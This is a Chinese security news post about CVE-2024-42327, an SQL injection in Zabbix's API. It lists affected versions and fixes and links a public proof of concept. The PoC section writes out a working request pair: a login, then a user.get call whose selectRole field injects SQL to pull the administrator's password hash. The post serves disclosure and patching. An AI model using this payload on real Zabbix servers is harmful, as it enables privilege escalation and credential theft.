CVE-2024-42327 Zabbix 严重漏洞POC已公开!

admin 2024年12月4日22:17:53评论90 views字数 1956阅读6分31秒阅读模式

CVE-2024-42327 Zabbix API SQL注入漏洞公开POC

漏洞情况

官方通报:

https://support.zabbix.com/browse/ZBX-25623

漏洞类型:

SQL 注入(SQL Injection, CWE-89);

漏洞编号:CVE-2024-42327;

严重性等级:Critical(严重);

CVSS 分数:9.9;

影响范围:Zabbix 6.0.0 至 6.0.31、Zabbix 6.4.0 至 6.4.16、Zabbix 7.0.0;

修复版本:6.0.32rc1、6.4.17rc1、7.0.1rc1

CVE-2024-42327 Zabbix 严重漏洞POC已公开!

漏洞描述

在 Zabbix 前端,具有默认“用户”(User)角色或其他具备 API 访问权限的非管理员用户,可以利用该漏洞发起攻击。

SQL 注入存在于 CUser 类的 addRelatedObjects 函数中,而该函数由 CUser.get API 调用。

由于所有具备 API 访问权限的用户均可调用 CUser.get,导致低权限用户能够注入恶意 SQL 语句,进而实现权限提升、敏感信息访问或其他更严重的攻击行为

漏洞成因

漏洞源于 addRelatedObjects 函数对输入参数的处理不当,未对传入的 SQL 查询参数进行充分验证。

攻击者可以通过 CUser.get API,构造恶意请求注入 SQL 语句。

利用条件

攻击者需要具备 API 访问权限,默认情况下 Zabbix 前端的“用户”角色即可满足条件,因此漏洞利用门槛较低。

攻击后果

权限提升:低权限用户可通过注入 SQL,访问到管理员权限账号的数据或其他敏感信息。

数据泄露:攻击者可利用注入的 SQL 查询数据库内容,窃取关键信息。

系统入侵:攻击者可能通过注入恶意 SQL 语句,执行进一步的持久化攻击或破坏操作。

官方响应

该漏洞由安全研究员 Márk Rákóczi(HackerOne 平台用户“reeeeeeeeeeee”)报告,已在以下版本中修复:6.0.32rc1、6.4.17rc1、7.0.1rc1, 漏洞修复的版本信息在 2024 年 11 月 27 日公开,建议用户尽快升级到修复版本!

POC 公开

目前POC已经公开,由于目前公众号的后台程序运行异常,需要的朋友可以自行去取:

https://github.com/aramosf/cve-2024-42327

1. 登录请求 (Login Request)

请求方法: POST

URL: http://<目标地址>/api_jsonrpc.php

请求体:

1{2"jsonrpc": "2.0",3"method": "user.login",4"params": {5"username": "aramosf",6"password": "Hola1234"7  },8"id": 19}

响应示例:

1{2"jsonrpc": "2.0",3"result": "cfb2be2d7aa9a8b432c5db2a19cd7f73",4"id": 15}

响应中 result 字段的值 (cfb2be2d7aa9a8b432c5db2a19cd7f73) 是会话令牌 (session token),用于后续的 API 请求。

2. 获取用户信息请求 (Fetch User Details Request)

请求方法: POST

URL: http://<目标地址>/api_jsonrpc.php

请求体:

1{2"jsonrpc": "2.0",3"method": "user.get",4"params": {5"selectRole": ["roleid, u.passwd", "roleid"],6"userids": "1"7  },8"auth": "cfb2be2d7aa9a8b432c5db2a19cd7f73",9"id": 110}

响应示例:

1{2"jsonrpc": "2.0",3"result": [4    {5"userid": "1",6"username": "Admin",7"name": "System",8"surname": "Administrator",9"role": {10"passwd": "d41d8cd98f00b204e9800998ecf8427e"11      }12    }13  ],14"id": 115}

攻击流程总结

1.登录获取令牌: 攻击者首先利用 user.login 方法,通过提供合法的用户名和密码,获得会话令牌。

2.批量请求用户信息: 使用 user.get 方法,枚举用户 ID 并提取相关用户详细信息。

3.攻击数据分析: 响应中的数据可能包含敏感信息(如用户名、哈希密码等),攻击者可以进一步尝试破解密码或分析用户权限。

漏洞点评

CVSS 9.9 评分的漏洞,利用条件较低,建议及时排查修复升级到修复版本。

原文始发于微信公众号(一个不正经的黑客):CVE-2024-42327 Zabbix 严重漏洞POC已公开!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月4日22:17:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-42327 Zabbix 严重漏洞POC已公开!https://cn-sec.com/archives/3465205.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息